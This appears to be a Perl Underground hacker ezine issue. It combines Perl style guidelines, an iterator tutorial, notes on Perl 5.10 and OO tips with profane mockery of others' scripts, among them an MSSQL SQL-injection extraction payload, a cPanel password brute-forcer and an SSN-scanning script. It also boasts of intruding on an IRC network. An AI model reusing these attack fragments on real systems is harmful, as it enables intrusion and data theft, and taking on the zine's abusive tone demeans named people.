~~~~~~~~~~~~~~~~
Last week, hakkr posted some coding guidelines which I found to be too
restrictive, and not addressing enough aspects. Therefore, I've made some
guidelines as well. These are my personal guidelines, I'm not enforcing
them on anyone else.
Turning on warnings helps you find problems in your code. But it's only
useful if you understand the messages generated. You should also know when
to disable warnings - they are warnings after all, pointing out potential
problems, but not always bugs.
NFS servers will be down, permissions will change, files will disappear,
disks will fill up, resources will be used up. System calls can fail for a
number of reasons, and failure is not uncommon. Programs should never
assume a system call will succeed - they should check for success and deal
with failures. The rare case where you don't care whether the call
succeeded should have a comment saying so.
All system calls should be checked, including, but not limited to, close,
seek, flock, fork and exec.
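Concretely, a short sketch of checked calls (the filenames are invented;
the unlink is the one deliberate don't-care):

```perl
use strict;
use warnings;

# Every call checked, even close; the one deliberate don't-care is commented.
open my $fh, '<', $0   or die "can't open $0: $!";    # the running script exists
my @lines = <$fh>;
close $fh              or die "can't close $0: $!";   # yes, close can fail too

printf "read %d lines from myself\n", scalar @lines;

unlink 'leftover.tmp';   # failure ignored on purpose: the file may never have existed
```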
Signals can be sent to the program. There are default actions - but they
are not always appropriate. If not, signal handlers need to be installed.
Care should be taken since not everything is reentrant. Both pre-5.8.0 and
post-5.8.0 have their own issues.
END blocks and __DIE__ handlers should be used if the program needs to
clean up after itself, even if the program terminates unexpectedly - for
instance due to a signal, an explicit die or a fatal error.
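A sketch of the idea (the scratch filename is invented):

```perl
use strict;
use warnings;

my $tmpfile = "cleanup-demo.$$";   # invented scratch file

open my $fh, '>', $tmpfile or die "can't create $tmpfile: $!";
print $fh "scratch data\n";
close $fh or die "can't close $tmpfile: $!";

# Route SIGINT through die so that cleanup still happens.
$SIG{INT} = sub { die "caught SIGINT\n" };

# Runs on normal exit, on die, and on signals turned into die above.
END {
    unlink $tmpfile if defined $tmpfile;
}
```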
Why break a good UNIX tradition? Different failures should have different
exit values.
~ Daemons SHOULD never write to STDOUT or STDERR but SHOULD use the syslog
service to log messages. They should use an appropriate facility and
appropriate priorities when logging messages. ~
Daemons run with no controlling terminal, and usually their standard
output and standard error disappear. The syslog service is a standard UNIX
utility especially geared towards daemons with a logging need. It allows
the system administrator to determine what is logged, and where, without
the need to modify the (running) program.
--help should print a usage message and exit, while --version should print
the version number of the program.
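Getopt::Long, a core module, makes that convention a few lines; the usage
text below is illustrative:

```perl
use strict;
use warnings;
use Getopt::Long;

our $VERSION = '1.00';

GetOptions(
    'help'    => sub { print "usage: $0 [--help] [--version] FILE...\n"; exit 0 },
    'version' => sub { print "$0 version $VERSION\n"; exit 0 },
) or die "invalid options; try '$0 --help'\n";
```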
Regression tests help catch breakage of code. The regression tests should
'touch' all the code - that is, every piece of code should be executed
when running the regression suite. All border cases should be checked.
More tests are usually better than fewer. Behaviour on invalid inputs
needs to be tested as well.
And a source control tool will take care of keeping track of the history
of changes, version numbers, and who made the most recent change(s).
Perl doesn't check the types, or even the number, of arguments at compile
time. You will have to do that yourself.
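A sketch of doing that checking yourself (the subroutine, patterns and
messages are all invented):

```perl
use strict;
use warnings;
use Carp;

# Invented example: enforce the argument count and types by hand.
sub divide {
    croak "divide() expects exactly two arguments" unless @_ == 2;
    my ($num, $den) = @_;
    croak "divide() expects numbers"
        unless $num =~ /\A-?\d+(?:\.\d+)?\z/ and $den =~ /\A-?\d+(?:\.\d+)?\z/;
    croak "division by zero" if $den == 0;
    return $num / $den;
}

print divide(10, 4), "\n";   # prints 2.5
```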
This means that "normal" objects, where the attributes are stored inside
anonymous hashes or arrays should not be used. Non-OO programs benefit
from namespaces and strictness, why shouldn't objects? Use objects based
on keying scalars, like fly-weight objects, or inside-out objects. You
wouldn't use public attributes in Java all over the place either, would
you?
If you need lots of comments to explain your code, you may consider
rewriting it. Subroutines that have a whole blob of comments describing
arguments and return values are suspect. But do document invariants, pre-
and postconditions, (mathematical) relationships, theorems, observations
and other relevant things the code assumes. Variables with a broad scope
might warrant comments too.
~ POD SHOULD NOT be interleaved with the code, and is not an alternative for
comments. ~
Comments and POD have two different purposes. Comments are there for the
programmer. The person who has to maintain the code. POD is there to
create user documentation from. For the person using the code. POD should
not be interleaved with the code because this makes it harder to find the
code.
"No global variables", but better. Just disallowing global variables means
you can still have a loop variant with a file-wide scope. Limiting the
scope of variables means that loop variants are only known in the body of
the loop, temporary variables only in the current block, etc. But
sometimes it's useful for a variable to be global, or have a file-wide
scope.
~ Variables with a small scope SHOULD have short names, variables with a
broad scope SHOULD have descriptive names. ~
/, !, | and the four sets of braces are acceptable, #, @ and * are not.
Thick delimiters take too much attention. An exception is made for: q
$Revision: 1.1.1.1$, because RCS and CVS scan for the dollars.
Note that there is no whitespace between ++ and -- and their operands,
nor between -> and its operands.
Again, readability.
~ There SHOULD NOT be whitespace after an opening parenthesis, or before a
closing parenthesis. There SHOULD NOT be whitespace after an opening
indexing bracket or brace, or before a closing indexing bracket or
brace. ~
~ The opening brace of a block SHOULD be on the same line as the keyword and
the closing brace SHOULD align with the keyword, but short blocks are
allowed to be on one line. ~
There is just no excuse for that. More than 80 characters means it will
wrap in too many situations, leading to hard to read code.
This makes code look more pleasing, and it brings attention to the fact
similar things are happening on close by lines. Example:
my $var      = 18;
my $long_var = "Some text";
This is just a first draft. I've probably forgotten some rules.
#!/usr/bin/perl
use LWP::UserAgent;
# Ahhh yes... the always needed eleet startup banner proudly proclaiming
# that this shitty code was done by a
# shitty coder for an equally shitty site/group.
sub getrecord{
while($colcount < $colnum){ # Package vars...
my $url = "http://".$host.$path."1+AND+(select+cast(CHAR(+127+)%2b+rtrim(cast((select+ISNULL(cast(".@cols[$colcount]."+as+varchar)%2c'null')+from+(select+top+1+*++from+(select+TOP+".$count."+*+from+".$db."..customers+order+by+1+desc+)+dtable+order+by+1+asc)+finaltable)+as+varchar))%2b+CHAR(+127+)+as+int))+%3d+1++Or+3%3d6";
my $response = $ua->get($url);
my $content = $response->content;
# Why are things suddenly lexical?
# Cause you stole things right from the POD, you fucker
if($content =~ m/value(.*)to/) { # You don't need to tell Perl its
# got to match something genius.
open (RECORDS, '>>output.txt'); # And you claim to be a
# security guy...
print RECORDS $1;
close (RECORDS); # Nice parens there.
}
$colcount++;
}
open (RECORDS, '>>output.txt');
print RECORDS "$count\n";
close (RECORDS);
# ... *sigh*
}
args();
# Do yourself a favor and save coding Perl for those of us who know how,
# okay?
This can be blamed, in large part, on Perl not having any shocking fresh
releases recently. Au contraire, we have been waiting on Perl 6 for a
long, long time.
Perl is further hindered by its history: who wants to use the web language
of the 1990s? In the 90s, when people wanted to write truly horrible HTML
generators, they came to Perl. If this is the Perl you remember, it's time
to take a step back and realize how much more Perl was, and how much more
it is today.
I'm here to tell you the inside part of that story. Perl can more than
compete with other current languages. Further, Perl is an elite language,
above and beyond its competitors in significant ways.
Perl has been around for 20 years. 20 years of development. Ruby and PHP
are just trying to grasp unicode, for Christ's sake. That's a long way
from Perl having NATIVE unicode support since 2000. Just how much better
Perl's unicode support is (a LOT better) could fill another rant, but that
isn't the point - it is just an example of Perl's maturity.
See, maturity is an important concept. If you code Perl, you can build off
of 20 years of Perl-specific knowledge. The understanding of best practices
in Perl has evolved to an art form. Many of the very gurus who slowly
developed their knowledge over this time are still around, easily
accessible. The actual Perl interpreter is something to be admired, and has
undergone so many years of inspection (but is *still* being improved
internally, in many ways for Perl 5.10).
Perl has CPAN (or "the CPAN" to purists). CPAN is an archive of Perl
modules, and no other language has anything like it at that scale. CPAN
has over 13,000 modules. Many of these have been developed for years, and
are very stable. There are even websites out there to critique Perl modules,
and evaluate their code quality. To put this in perspective, Python has a
"package index", pypi, with over 3500 packages. However, these aren't
modules - many are just random pieces of Python that currently complete some
task. Some are good, but the general level of quality is much lower than
the Perl source on CPAN. And they lack both the amount and the length of
review that happens with Perl modules. This isn't a knock on Python -
you'd be hard
pressed to find another language that does better in these areas. Perl is
just way ahead of the field when it comes to libraries and community.
Why does this matter? Because if you use almost any language, you end up
in Lone Ranger mode - you have a base set of tools that you can trust, but
otherwise you are on your own. C is an obvious example, where you have a
slim standard library for small tasks, and you can probably find some code
online that does something like what you want to do. Coding in Python is
like this, just to a lesser degree. You might find what you want on Pypi,
if you're not doing something too original, but it could be shady, badly
designed, unreliable, and very poorly investigated.
Perl is portable. Your Perl code is very likely to work on any box that
has Perl installed, and has the modules you need. Perl (the program) will
compile on a massive list of operating systems. You can find pre-compiled
binaries for a similar list, see http://www.cpan.org/ports/. Most Perl code
will not need modifications to work on other operating systems, let alone
modifications just to "compile" it (like you would with much C).
The language itself is very powerful. You can chain references as deep as
you want to create any kind of data structure you would like. You can
generate and pass anonymous subroutines. Perl has better regular
expressions than anywhere else, and has continued to lap the field with
the Perl 5.10 improvements. Modules are easy to create and inherit from. The
language is incredibly flexible to use, and everything is easy. And on and
on and on.
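For example, arbitrary nesting plus an anonymous sub in one small
structure (all of the data here is invented):

```perl
use strict;
use warnings;

# A nested structure with an anonymous sub inside it.
my %server = (
    name   => 'web01',
    ports  => [80, 443],
    checks => {
        http => sub { my ($code) = @_; return $code == 200 },
    },
);

for my $port (@{ $server{ports} }) {
    print "$server{name} listens on $port\n";
}
print "http ok\n" if $server{checks}{http}->(200);
```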
Perl makes it much easier to write correct and secure code than most
languages. On top of simply being a well-developed, mature, interpreted
language, Perl provides strict, warnings, and taint mode to assist you.
Coding in Perl goes long past just trying to make it work - that's often
incredibly easy. Perl coding becomes about just how to make it work, to be
clean, resource friendly, and maintainable. Combined with the extensive
code archive and well-established practices, Perl is a very high-level
language.
Perl is popular. It doesn't have the popularity of C*, .NET, or Java, but
it also doesn't have massive corporate backing nor is it taught
extensively by colleges. Perl is the king of interpreted languages, and if
you are a good coder who codes good Perl, there is a job out there for you.
So if you are tired of dealing with the bugs of your language, or you're
tired of spending a majority of your coding effort on menial tasks, try
Perl. Look at other languages too - Python, Ruby, C, Java, these are all
fine languages with positive sides, and they might be right for your
project. But don't hold an old, outdated, prejudice against Perl. Remember
that while other languages have developed quickly, they are still playing
catch-up, while the last few years of work on Perl can be seen as invested
in Perl 5.10 and Perl 6, both of which are big improvements from whatever
Perl you remember.
-[0x12] # Some wit about iterators ---------------------------------------
But they don't have to be. You can often write iterators that look like
their recursive counterparts — they even include recursive calls — but
they don't suffer from explosive growth. That is, they'll still take a
long time to get through a billion combinations, but they'll start
returning them to you right away, and they won't eat up all your memory.
sub iter_choose_n {
my $n = pop;
# Base cases
my $once = 0;
return sub {$once++ ? () : []} if $n == 0 or $n > @_;
my ($first, @rest) = @_;
return sub {$once++ ? () : [$first, @rest]} if $n == @_;
Apart from the iterator trappings, we've got essentially what we had
before. Converting the map into an iterator involves some similar work,
but the parallels are still pretty obvious. We exhaust the first iterator
before turning to the second:
# otherwise..
my $include_iter = iter_choose_n(@rest, $n-1);
my $exclude_iter = iter_choose_n(@rest, $n);
return sub {
if (my $set = $include_iter->()) {
return [$first, @$set];
}
else {
return $exclude_iter->();
}
}
# otherwise..
my $include_iter = iter_choose_n(@rest, $n-1);
my $exclude_iter;
return sub {
if (my $set = $include_iter->()) {
return [$first, @$set];
}
else {
$exclude_iter ||= iter_choose_n(@rest, $n);
return $exclude_iter->();
}
}
}
Now our code is singly recursive, O(N) in space and time to generate an
iterator, and that makes a big difference. Big enough that you probably
won't need to go to the trouble of coming up with an O(1) truly iterative
solution.
# otherwise..
my $include_iter = iter_choose_n(@rest, $n-1);
my $exclude_iter;
return sub {
if ($include_iter and my $set = $include_iter->()) {
return [$first, @$set];
}
else {
if ($include_iter) {
undef $include_iter;
$exclude_iter = iter_choose_n(@rest, $n);
}
return $exclude_iter->();
}
}
}
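Assembled into something runnable, the final refinement plus a driver
loop looks like this (the demo data is invented):

```perl
use strict;
use warnings;

# Fully assembled from the refinements above: the "exclude" iterator is
# created lazily, and the "include" iterator is freed once exhausted.
sub iter_choose_n {
    my $n = pop;

    # Base cases
    my $once = 0;
    return sub { $once++ ? () : [] } if $n == 0 or $n > @_;

    my ($first, @rest) = @_;
    return sub { $once++ ? () : [$first, @rest] } if $n == @_;

    # otherwise..
    my $include_iter = iter_choose_n(@rest, $n - 1);
    my $exclude_iter;
    return sub {
        if ($include_iter and my $set = $include_iter->()) {
            return [$first, @$set];
        }
        else {
            if ($include_iter) {
                undef $include_iter;
                $exclude_iter = iter_choose_n(@rest, $n);
            }
            return $exclude_iter->();
        }
    };
}

my $pick = iter_choose_n(qw(a b c), 2);
while (my $set = $pick->()) {
    print "@$set\n";     # a b / a c / b c
}
```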
-[0x13] # Some gumhead named Gumbie --------------------------------------
=pod
From: superheroes@hushmail.com
Not all of our spoils from our hacks make it into our zine. Some of them are
left out simply because they are dull; others are left out due to space
constraints and still others are omitted because we cannot think of a good
way to present them, or we know someone who can do it better.
This is one such case. During our romp through the HellBound Hackers' IRC
network, we came across this Perl script that one of the IRC opers/server
admins there (specifically Gumbie) had written in an attempt to catch
people running privileged processes on his servers.
The code quality was terrible, and provided us for a good laugh. There were
also various design issues. Come on, a monitoring program that does no
integrity checking of its logs or itself? Not to mention that the whole
concept of the program screams "1992".
In any event, we decided to email this to you, and let the real experts
of the field handle this one. Hope it amuses you as well as your readers.
--ZF0
=cut
# Sure thing.
# For future reference, we encourage material contributions (and rarely
# turn them down, even if the target is some random loser we've never
# heard of).
# Did you do all this tabbing yourselves or did it come like this?
#!/usr/bin/perl
#print @list
foreach $p (@list) { # You really like foreach(), don't you?
# print "--------------------------------\n";
# print "pid: ", $p->{pid}, " uid: ", $p->{uid}, " euid: ", $p->{euid}, " ppid: ";
# print $p->{ppid}, " ", $p->{cmndline}, "\n";
# No exit?
# Wow that was shitty. All those pointless loops and random variables. It
# was a nightmare to follow.
# Please, gumbie, do the world a favor and never code anything ever again.
Here are some things off the top of my head that I think are pretty cool:
state variables
No more scoping variables with an outer curly block, or the
naughty my $f if 0 trick (the latter is now a syntax error).
defined-or
No more $x = defined $y ? $y : $z, you may write $x = $y // $z
instead.
regexp improvements
Lots of work done by dave_the_m to clean up the internals, which
paved the way for demerphq to add all sorts of new cool stuff.
smaller variable footprints
Nicholas Clark worked on the implementations of SVs, AVs, HVs and
other data structures to reduce their size to a point that happens
to hit a sweet spot on 32-bit architectures.
smaller constant sub footprints
Nicholas Clark reduced the size of constant subs (like use
constant FOO => 2). The result when loading a module like POSIX is
significant.
stacked filetests
you can now say if (-e -f -x $file). Perl 6 was supposed to allow
this, but they moved in a different direction. Oh well.
lexical $_
allows you to nest $_ (without using local).
_ prototype
you can now declare a sub with prototype _. If called with no
arguments, gets fed with $_ (allows you to replace builtins more
cleanly).
x operator on a list
you can now say my @arr = qw(x y z) x 4. (Update: this feature was
backported to the 5.8 codebase after having been implemented in blead,
which is how Somni notices that it is available in 5.8.8).
switch
a true switch/given construct, inspired by Perl 6
smart match operator (~~)
to go with the switch
closure improvements
dave_the_m thoroughly revamped the closure handling code to fix a
number of buggy behaviours and memory leaks.
faster Unicode
lc, uc and /i are faster on Unicode strings. Improvements to the
UTF-8 cache.
improved sorts
inplace sorts performed when possible, rather than using a
temporary. Sort functions can be called recursively: you can sort a
tree.
map in void context
is no longer evil. Only morally.
fewer opcodes
used in the creation of anonymous lists and hashes. Faster pussycat!
tainting improvements
More things that could be tainted are marked as such (such as
sprintf formats)
$# and $* removed
Less action at a distance
perlcc and JPL removed
These things were just bug magnets, and no-one cared enough about
them.
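A quick sketch of a few of these in action, assuming perl 5.10 or later:

```perl
use strict;
use warnings;
use feature qw(say state);

# defined-or keeps a legitimate 0 or "" alive, where || would not
my $configured = 0;
my $port = $configured // 8080;
say $port;                        # 0

# state: the counter trick from the closure examples, minus the outer block
sub next_id {
    state $id = 0;
    return ++$id;
}
say next_id() for 1 .. 3;         # 1, 2, 3

# stacked filetests
say "this script exists and is readable" if -e -r $0;
```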
update: ok, in some ways that's just a rehash of perldelta, here's the
executive summary:
There has been an awful lot of refactoring done under the hood. Andy
"petdance" Lester added const to just about everything that it was
possible to do, and in the process uncovered lots of questionable
practices in the code. Similarly, Nicholas Clark and Dave Mitchell nailed
down many, many, many memory leaks.
Much of the work done to the internals results in a much more robust
engine. Far likelier, err, less likely, to leak, or, heaven forbid, dump
core. If you have long-running processes that chew through datasets and/or
use closures heavily, that is a good reason to upgrade.
For new developments, there are a number of additions at the syntax level
that make writing Perlish code even better. Mark Jason Dominus's book
Higher-Order Perl makes heavy use of constructs, such as closures, that
tend to leak in 5.8. If this style of programming becomes more widespread
(and I hope it does, because it allows one to leverage the power of the
language in extraordinary ways) then 5.10 will be a better fit.
Years ago, having been bitten by nasty things in 5.6, I asked Does 5.8.0
suck?. As it turns out, it didn't. I think that 5.10 won't suck, either.
One big thing that has changed since then is that far more people are
smoking all sorts of weird combinations of build configurations on a
number of different platforms, and many corrections are being made as a
result. Things that otherwise would have forced a 5.10.1 to be pushed out
in short order.
People need to go back to the basics. Read some documentation. I'll even
provide links to the cute online perldoc.
Syntax - http://perldoc.perl.org/perlsyn.html
Data types - http://perldoc.perl.org/perldata.html
Subroutines - http://perldoc.perl.org/perlsub.html
Operators - http://perldoc.perl.org/perlop.html
Functions - http://perldoc.perl.org/perlfunc.html
Regex - http://perldoc.perl.org/perlre.html
References - http://perldoc.perl.org/perlref.html
Structures - http://perldoc.perl.org/perldsc.html
-[0x16] # Hessam-x needs schooling (and not just for English) ------------
Perl Underground talk about exploiters perl codes. in this ezine they
focused on bad perl codes. this is really nice .
Read this ezine on milw0rm.com
# The above quote comes from Hessam-x' website from quite a while back.
# It's good that he likes our zine, we like that, but all the more reason
# to make sure he improves his Perl!
#!/usr/bin/perl
# Cpanel Password Brute Forcer
# ----------------------------
# (c)oded By Hessam-x
# Perl Version ( low speed )
# Oerginal Advisory :
# http://www.simorgh-ev.com/advisory/2006/cpanel-bruteforce-vule/
use IO::Socket;
use LWP::Simple;
use MIME::Base64;
headx();
sub headx() {
print q(
###############################################################
# Cpanel Password Brute Force Tool #
# (c)oded By Hessam-x / simorgh-ev.com #
###############################################################
);
# Lame open format, and lame that you just read and then process.
# while ( <$passfile> ) { # etc
open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !";
@PASSWORDS = <PASSFILE>;
close PASSFILE;
foreach my $P (@PASSWORDS) {
chomp $P; # uh...
$passwd = $P; # uh...
print "\n [~] Try Password : $passwd \n";
&brut;
};
}
sub brut() {
# How about you learn how to send parameters to functions, retard
$authx = encode_base64($user.":".$passwd);
print $authx;
if ($answer =~ /Moved/) {
print "\n [~] PASSWORD FOUND : $passwd \n";
exit();
}
}
# Was there a single line in that whole script that didn't suck? Short and
# shitty. We went extra easy because you're a fan :-D
NAME
SYNOPSIS
The following is not about how to write OO code in Perl. There's plenty of
nodes covering that topic. Instead, this is a general list of tips that I
like to keep in mind when I'm writing OO code. It's not exhaustive, but it
does cover a number of areas that I see many people (including myself),
get wrong or overlook.
PROBLEMS
Useless OO
sub new {
my ($class,%data) = @_;
return bless \%data, $class;
}
use Acme::Playmate;
Object Hierarchy
Don't subclass simply to alter data
Subclass when you need a more specific instance of a class, not just to
change data. If you do that, you simply want an instance of the object,
not a new class. Subclass to alter or add behavior. While I don't see this
problem a lot, I see it enough that it merits discussion.
package Some::User;
sub new {
    my ($class, $type) = @_;
    $class .= "::$type";
    bless {}, $class;
}
sub user { die "user() must be implemented in subclass" }
sub pass { die "pass() must be implemented in subclass" }
sub url  { die "url() must be implemented in subclass" }
package Some::User::Foo;
our @ISA = ('Some::User');
sub user { 'bob' }
sub pass { 'seKret' }
sub url  { 'http://somesite.com/' }
my $foo = Some::User->new('Foo');
Thus, if you need to change how things work internally, you're doing that
on only one class rather than hunting through a bunch of useless
subclasses.
Law of Demeter
The Law of Demeter simply states that you should only talk to your
immediate friends -- using a chain of method calls to navigate an object
hierarchy is begging for trouble. For example, if an office object has a
manager object, an instance of that manager might have a name.
print $office->manager->name;
That seems all fine and dandy. Now, imagine that you have that in 20
places in your code, but in the manager class, someone changes name to
full_name. Because the code using the office object was forced to walk
through the object hierarchy to get at the data it actually needs, you've
created fragile code. Now the manager class must support a name method to
be backwards compatible (and we get to start on our big ball of mud), or
every reference to it must be changed -- but we've created far too many.
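The usual fix is a single delegation method; a sketch with invented class
and method names:

```perl
use strict;
use warnings;

package Manager;
sub new  { my ($class, %args) = @_; bless {%args}, $class }
sub name { $_[0]{name} }

package Office;
sub new     { my ($class, %args) = @_; bless {%args}, $class }
sub manager { $_[0]{manager} }

# The one place that knows about the office->manager->name chain.
sub manager_name { $_[0]->manager->name }

package main;

my $office = Office->new(manager => Manager->new(name => 'Alice'));
print $office->manager_name, "\n";   # prints Alice
```

If name ever becomes full_name, only manager_name() needs to change.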
Now, instead of hunting down all of the places where this was accessed,
we've limited this call to one spot and made maintenance much easier. This
can, however, lead to code bloat. Make sure you understand the tradeoffs
involved.
Liskov substitution principle
While there is disagreement over what this means, this principle states
(paraphrasing) that a subclass must present the same interface as its
superclass. Some argue that the behavior of subclasses (or subtypes)
should not change, though I feel that with proper encapsulation, this
distinction goes away. For example, imagine a cash register program where
a person's order is paid via a combination of credit card, check, and cash
(such as when three people annoy the waiter by splitting the bill).
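A sketch of that cash register (all names invented): each payment type
honours the same interface, so the register never cares which kind it
holds.

```perl
use strict;
use warnings;

package Payment;
sub new    { my ($class, %args) = @_; bless {%args}, $class }
sub amount { $_[0]{amount} }
sub pay    { die "pay() must be implemented in a subclass" }

package Payment::Cash;
our @ISA = ('Payment');
sub pay { sprintf "collected %.2f in cash", $_[0]->amount }

package Payment::Check;
our @ISA = ('Payment');
sub pay { sprintf "deposited a check for %.2f", $_[0]->amount }

package Payment::CreditCard;
our @ISA = ('Payment');
sub pay { sprintf "charged %.2f to the card", $_[0]->amount }

package main;

# The register treats every payment alike: same interface, any subtype.
for my $p (Payment::Cash->new(amount => 10),
           Payment::Check->new(amount => 15.50),
           Payment::CreditCard->new(amount => 4.25)) {
    print $p->pay, "\n";
}
```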
Methods
$object->{foo};
All of these issues and more crop up when you let people reach into the
object. One of the major points of OO programming is to allow proper
encapsulation of what's going on inside of the object. As soon as you let
your defensive programming guard down, you're going to get bug reports.
Use proper methods to handle this:
$object->foo;
$object->set_foo($foo);
if ($object->error) {
$object->log_errors
} # bad!
Whoops! Now we have a problem. Not only does every place in the code that
might want to log errors have to first check if those errors exist, your
log_errors method might erroneously assume that this has been checked.
Check the state inside of the method.
sub log_errors {
my $self = shift;
return $self unless $self->error;
$self->_log_errors;
}
Better yet, there's a good chance that you're not concerned about the
error log at runtime, so you could simply specify an error log in your
constructor (or have the class use a default log), and let the module
handle all of that internally.
sub connect {
my $self = shift;
unless ($self->_get_rss_feed) {
$self->_log_errors;
$self->_fetch_cached_copy;
}
$self;
}
In the above example, there's an error that should be noted, but since a
cached copy of data is acceptable, there's no need for the program to deal
with this directly. The object notes the problem internally, adopts a
fallback remedy and everything is peachy.
Keep your data structures uniform
(I saw this on use.perl but I can't remember who posted it)
$object->set_foo( $object->get_foo );
Failure to do this will cause no end of grief for programmers who assume
that the object accepts the data structures that it emits.
Debugging
$object->as_string
That's easier to read and, by doing lookups on the category and bin ids,
you can present output that's easier to understand.
Test
I've saved the best for last for a good reason. Write a full set of tests!
One of the nicest things about tests is that you can ask someone to run
them if they submit a bug report. Failing that, it's a perfect way to
ensure that a bug does not return, that your objects behave as documented
and that you don't have ``extra features'' that you weren't expecting.
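As a sketch of what a first test file buys you for a small hashref-based
class (the class name and assertions are invented), using the standard
Test::More:

```perl
use strict;
use warnings;
use Test::More tests => 3;

# An illustrative class using a plain hashref constructor.
package My::Class;
sub new {
    my ($class, %data) = @_;
    bless \%data => $class;
}

package main;

my $obj = My::Class->new(name => 'bob');
isa_ok($obj, 'My::Class');
is($obj->{name}, 'bob', 'constructor stores its arguments');
ok(!exists $obj->{age}, 'no extra features we were not expecting');
```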
sub new {
my ($class, %data) = @_;
bless \%data => $class;
}
Yet another fascinating thing about tests is the freedom they give you. If
you have a comprehensive test suite, you can start taking liberties with
your code in a way that you haven't before. Are you having performance
problems because you're using an accessor in the bottom of a nested loop?
If the object is a blessed hashref, you might get quite a performance
boost by just ``reaching inside'' and grabbing the data you need directly.
While many will tell you this is a no-no, the reason they mention this is
for maintainability. However, a good test suite will protect you against
many of the maintainability problems you may face (though it still won't
make fixing your encapsulation violations any easier once you are bitten).
That last paragraph might sound a bit curious. Is Ovid really telling
people it's OK to violate encapsulation, particularly after he pointed out
the evils of it?
Yes, I am saying that. I'm not recommending that, but one thing that often
gets lost in the shuffle when ``paradigm'' flame wars begin is that
programming is a series of compromises. Rare indeed is the programmer who
can claim that she's never compromised the integrity of her code for
performance, cost, or deadline pressures. We want to have a perfect system
that people will ``ooh'' and ``aah'' over, but when you see the boss
coming down the hall with a worried look, you realize that the latest
nasty hack is going to make its way into production. Tests, therefore, are
your friend. Tests will tell you if the nasty little hack works. Tests
will tell you when the nasty little hack breaks.
CONCLUSION
Update: I really should have called this "Often Overlooked Object Oriented
Observations". Then we could refer to this node as "'O'x5".
Cheers,
Ovid
#!/usr/bin/perl
use strict;
use File::Find;
# You know that all your little formatting stuff is lame, right?
# Why not just use the localtime as it's returned?
# At least you did localtime(time) though. That's something.
# Our guess is that you meant while (<FILE>) but just were too fucking lame to notice
# that you lost at the internet. And yes, we did "view source" to be sure ;[
while () {
# Search documents for SSN's
if (/([0-9]{3}-[0-9]{2}-[0-9]{4})/) { # Ah, the implicitness...
$found = $1;
next;
}
}
print LOG "FOUND: $foundFile\n" if $found; # At least you know one-line if()'s
}
print "\nSearch completed. Wrote to file: $logdir$logname"; # No "\n" or / ?
# TS/SCI security is a good example of some jerkoffs who want to put themselves somewhere in the blog
# scene but don't have any content to back them up. So they say "let's put up four or five really
# shitty scripts, in different languages, to show those blog-reading bitches that we've got skillz,
# but we're going to be too lame to actually get it right or notice the mistakes, and nobody will read
# our shit anyways so it's all good"
# Good thing we have talented people to poke fun at, otherwise we'd rip apart every fucking piece of
# code you penisgrabbers had up there.
That's all, folks. Thanks for coming out. Thanks to the people who helped out, and
to everyone who waited patiently. Shouts to everyone using Perl 5.10 already.
___ _ _ _ _ ___ _
| _ | | | | | | | | | | | |
| _|_ ___| | | | |___ _| |___ ___| _|___ ___ _ _ ___ _| |
| | -_| _| | | | | | . | -_| _| | | _| . | | | | . |
|_|___|_| |_| |___|_|_|___|___|_| |___|_| |___|___|_|_|___|
Forever Abigail